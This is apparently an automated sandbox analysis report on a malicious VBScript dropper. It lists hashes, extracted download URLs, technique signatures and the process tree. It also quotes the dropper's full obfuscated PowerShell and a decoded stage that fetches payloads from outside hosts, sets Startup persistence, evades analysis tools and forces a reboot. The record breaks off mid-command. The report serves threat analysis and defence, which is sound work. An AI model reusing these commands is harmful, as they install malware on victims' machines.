83c42273c86a72a1ca3c7ca04e2460711c55abd5bb683eae71d54f0ba38d49fc

General

Target

Sign100000120001.vbs
Size

91KB
MD5

a7852939ea4eff9943163f2df44d425b
SHA1

500c33c8aea15e777dfe79d684e91d60e053eca2
SHA256

77b2713d68eaf0dd8c74bcaa12d8c15a3bcb26eb5784f28169b14351c0a2fc45
SHA512

6dac1d7dea7e5a6040df6e8d386e7ea1712060171a34200de9707447b5a79751f6ca8730e274d0db8c335d16c48b03b379088bd4f7ff3dcb3a7722b2d266e2bd
SSDEEP

1536:vBBBBBBBBB/Fzpy8G/nBBBBBBBBBBBBBBBBB:vBBBBBBBBBOBBBBBBBBBBBBBBBBB

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://desckvbrat.com.br/Upcrypter/01/DLL01.txt

exe.dropper

https://drive.google.com/uc?export=download&id=

exe.dropper

https://desckvbrat.com.br/Upcrypter/01/DLL01.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2000	powershell.exe
7	2000	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sign100000120001.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sign100000120001.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2180	powershell.exe
2472	powershell.exe
2000	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2472	powershell.exe
2000	powershell.exe
2832	powershell.exe
2180	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 2472	2336	WScript.exe	30
PID 2336 wrote to memory of 2472	2336	WScript.exe	30
PID 2336 wrote to memory of 2472	2336	WScript.exe	30
PID 2472 wrote to memory of 2000	2472	powershell.exe	32
PID 2472 wrote to memory of 2000	2472	powershell.exe	32
PID 2472 wrote to memory of 2000	2472	powershell.exe	32
PID 2000 wrote to memory of 2832	2000	powershell.exe	34
PID 2000 wrote to memory of 2832	2000	powershell.exe	34
PID 2000 wrote to memory of 2832	2000	powershell.exe	34
PID 2832 wrote to memory of 2584	2832	powershell.exe	35
PID 2832 wrote to memory of 2584	2832	powershell.exe	35
PID 2832 wrote to memory of 2584	2832	powershell.exe	35
PID 2000 wrote to memory of 2180	2000	powershell.exe	36
PID 2000 wrote to memory of 2180	2000	powershell.exe	36
PID 2000 wrote to memory of 2180	2000	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $blpvk = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE4ASg' + [char]66 + 'lAFQAdwAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAbQ' + [char]66 + 'zAEEAZw' + [char]66 + 'lAFIARA' + [char]66 + 'EACAARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHUAcA' + [char]66 + 'hAGQAYQ' + [char]66 + 'yAGkAYQAuAG8Acg' + [char]66 + 'nAC8AeA' + [char]66 + '4AHAALg' + [char]66 + '0AHgAdAAnACcAIAAoACAAXQ' + [char]66 + 'dAFsAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8AWwAgACwAIA' + [char]66 + 'sAGwAdQ' + [char]66 + 'uACQAIAAoAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JAC4AKQAgACcAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUAJwAgAD0AKwAgAE4ASg' + [char]66 + 'lAFQAdwAkADsAIAAnAE0AdA' + [char]66 + 'lAEcALgApACAAJwAnADEAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DAC4AMw' + [char]66 + '5AHIAYQ' + [char]66 + 'yAGIAaQ' + [char]66 + 'MAHMAcw' + [char]66 + 'hAGwAQwAnACcAIAAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcAJwAgAD0AKwAgAE4ASg' + [char]66 + 'lAFQAdwAkADsAIAAnAC4AKQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ACcAIAArACAAJwA6AF0Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAcA' + [char]66 + 'wAEEALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'OAEoAZQ' + [char]66 + 'UAHcAJAA7ACAAJwA7ACAAKQAgACkAJwAnAEEAJwAnACwAJwAnAJMhOgCTIScAJwAoAGUAYw' + [char]66 + 'hAGwAcA' + [char]66 + 'lAHIALg' + [char]66 + 'HAGUAYQ' + [char]66 + '5AHIAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AHMAWwAgAD0AIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwAnACAAPQArACAATg' + [char]66 + 'KAGUAVA' + [char]66 + '3ACQAOwAgACcAOwApADgARg' + [char]66 + 'UAFUAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALQAgACcAIAArACAAeA' + [char]66 + 'OAFYAWg' + [char]66 + 'lACQAIAArACAAJwAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAoACAAPQAgAEcAZQ' + [char]66 + 'hAHkAcgAkACAAOwAgACcAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAJwAgAD0AIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAnACAAIAA9ACAATg' + [char]66 + 'KAGUAVA' + [char]66 + '3ACQAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAeA' + [char]66 + 'OAFYAWg' + [char]66 + 'lACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAGUAbA' + [char]66 + 'pAEYALQAgAGUAbA' + [char]66 + 'pAEYALQ' + [char]66 + '0AHUATwAgAHwAIA' + [char]66 + 'wAHkAWQ' + [char]66 + 'TAE4AJAA7ACAAKQAgAEUATQ' + [char]66 + 'LAGYAdQAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'OAGwAcg' + [char]66 + 'oAFAAJAAgAD0AIA' + [char]66 + 'wAHkAWQ' + [char]66 + 'TAE4AJAA7ACAAKQAgAFYAcA' + [char]66 + 'rAHUASgAkACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACAAKAAgAD0AIAAgAEUATQ' + [char]66 + 'LAGYAdQAkADsAIAA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAE4AbA' + [char]66 + 'yAGgAUAAkADsAIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACAAPQAgAE4AbA' + [char]66 + 'yAGgAUAAkADsAIAApACcAdA' + [char]66 + '4AHQALgAyADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + '4AE4AVg' + [char]66 + 'aAGUAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAAnADgARg' + [char]66 + 'UAFUAJwAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAGUAbA' + [char]66 + 'pAEYALQAgAGUAbA' + [char]66 + 'pAEYALQ' + [char]66 + '0AHUATwAgAHwAIA' + [char]66 + 'jAGUAbQ' + [char]66 + 'SAGMAJAA7AHkATQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'CACAAPQAgAGMAZQ' + [char]66 + 'tAFIAYwAkACAAOw' + [char]66 + 'jAGUAbQ' + [char]66 + 'SAGMAJAAgAD0AIA' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAOwAgACkAIA' + [char]66 + 'oAG0AeQ' + [char]66 + 'uAGoAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAAgAD0AIA' + [char]66 + 'jAGUAbQ' + [char]66 + 'SAGMAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAoACAAPQAgAGgAbQ' + [char]66 + '5AG4AagAkADsAfQA7AHoAZA' + [char]66 + 'mAHkARgAkACAAbg' + [char]66 + 'yAHUAdA' + [char]66 + 'lAHIAOwApACkAZQ' + [char]66 + 'zAGEAYg' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwAkACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AHMAWwAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAHQAZQ' + [char]66 + 'HAC4AOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAA7AHsAeQ' + [char]66 + 'NAGUAcw' + [char]66 + 'hAEIAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGMAbg' + [char]66 + '1AEYAOw' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAOw' + [char]66 + '9ACAACgANADsAdA' + [char]66 + 'pAHgAZQAgACAAIAAgACAAIAAKAA0AOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAcg' + [char]66 + 'lAHQAdQ' + [char]66 + 'wAG0Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAUgAKAA0AIA' + [char]66 + '7AGUAcw' + [char]66 + 'sAGUACgANAAoADQ' + [char]66 + '9AAoADQAgACAAIAAgACAAIAAgAAoADQAgAHsAKQ' + [char]66 + 'sAGwAdQ' + [char]66 + 'OACQAIA' + [char]66 + 'xAGUALQAgACkAZQ' + [char]66 + '1AG4AaQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAHkAbA' + [char]66 + '0AG4AZQ' + [char]66 + 'sAGkAUwAgAGEAZQAtACAAJw' + [char]66 + 'lAHoAeQ' + [char]66 + 'sAGEAbg' + [char]66 + 'hACcALAAnAFMATg' + [char]66 + 'EAGUAdA' + [char]66 + 'hAHAAYQAnACwAJw' + [char]66 + 'rAHIAYQ' + [char]66 + 'oAHMAZQ' + [char]66 + 'yAGkAVwAnACAAcw' + [char]66 + 'zAGUAYw' + [char]66 + 'vAHIAcAAtAHQAZQ' + [char]66 + 'nACgAKA' + [char]66 + 'mAGkAOwAgADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAIA' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'RAEYAdg' + [char]66 + '6AFQAJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAAWA' + [char]66 + 'HAEMAQw' + [char]66 + 'KACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACgAIAA9ACAAWA' + [char]66 + 'HAEMAQw' + [char]66 + 'KADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'RAEYAdg' + [char]66 + '6AFQAJAA7ACkAIAApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACgAIAAsAHcAeg' + [char]66 + '0AHQAdwAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'wAHMAeg' + [char]66 + 'xAHYAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AcA' + [char]66 + 'zAHoAcQ' + [char]66 + '2ACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAcA' + [char]66 + 'zAHoAcQ' + [char]66 + '2ACQAOw' + [char]66 + '9ADsAIAApACcAdwA1ADAAWgAxADgAdQ' + [char]66 + 'jADcAWg' + [char]66 + 'NAEsAOAA4AGcAZQ' + [char]66 + '0AGgAag' + [char]66 + 'uAEEAcA' + [char]66 + 'qADEATA' + [char]66 + 'CAC0ANA' + [char]66 + '5AEgAYQ' + [char]66 + 'hADEAJwAgACsAIA' + [char]66 + '3AHoAdA' + [char]66 + '0AHcAJAAoACAAPQAgAHcAeg' + [char]66 + '0AHQAdwAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJw' + [char]66 + 'WAEUAUw' + [char]66 + 'kAGoAdw' + [char]66 + 'VADkANQ' + [char]66 + 'SAC0AVw' + [char]66 + 'zAFkAdQ' + [char]66 + 'aAEwAaQ' + [char]66 + '3AHIAYgA1AFkATg' + [char]66 + 'RAC0ASA' + [char]66 + 'qAHIAYgAyAHAAMQAnACAAKwAgAHcAeg' + [char]66 + '0AHQAdwAkACgAIAA9ACAAdw' + [char]66 + '6AHQAdA' + [char]66 + '3ACQAewAgACkAIA' + [char]66 + 'RAGQAZQ' + [char]66 + 'jAFQAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAFEAZA' + [char]66 + 'lAGMAVAAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + '3AHoAdA' + [char]66 + '0AHcAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAewAgACkAIA' + [char]66 + 'DAGUATw' + [char]66 + 'JAGMAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'DAGUATw' + [char]66 + 'JAGMAJAAgADsA';$blpvk = $blpvk.replace('уЦϚ' , 'B') ;;$slvnr = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $blpvk ) ); $slvnr = $slvnr[-1..-$slvnr.Length] -join '';$slvnr = $slvnr.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs');powershell $slvnr
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$wttzw = 'https://drive.google.com/uc?export=download&id=';$TcedQ = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $TcedQ ) {$wttzw = ($wttzw + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$wttzw = ($wttzw + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$vqzsp = (New-Object Net.WebClient);$vqzsp.Encoding = [System.Text.Encoding]::UTF8;$vqzsp.DownloadFile($wttzw, ($HzOMj + '\Upwin.msu') );$TzvFQ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs' -Destination ( $TzvFQ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$Stringbase;Function BaseMy{;$Fyfdz = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $Fyfdz;};$jnymh = ('https://desckvbrat.com.br/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$cRmec = $webClient.DownloadString( $jnymh ) ;$Stringbase = $cRmec; $cRmec = BaseMy;$cRmec | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$eZVNx = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$ufKME = ( Get-Content -Path $JukpV ) ;$NSYyp = $PhrlN.DownloadString( $ufKME ) ;$NSYyp | Out-File -FilePath $eZVNx -force ;$wTeJN = '$sNwoM = ''C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs'' ; $ryaeG = (Get-Content -Path ' + $eZVNx + ' -Encoding UTF8);' ;$wTeJN += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$wTeJN += 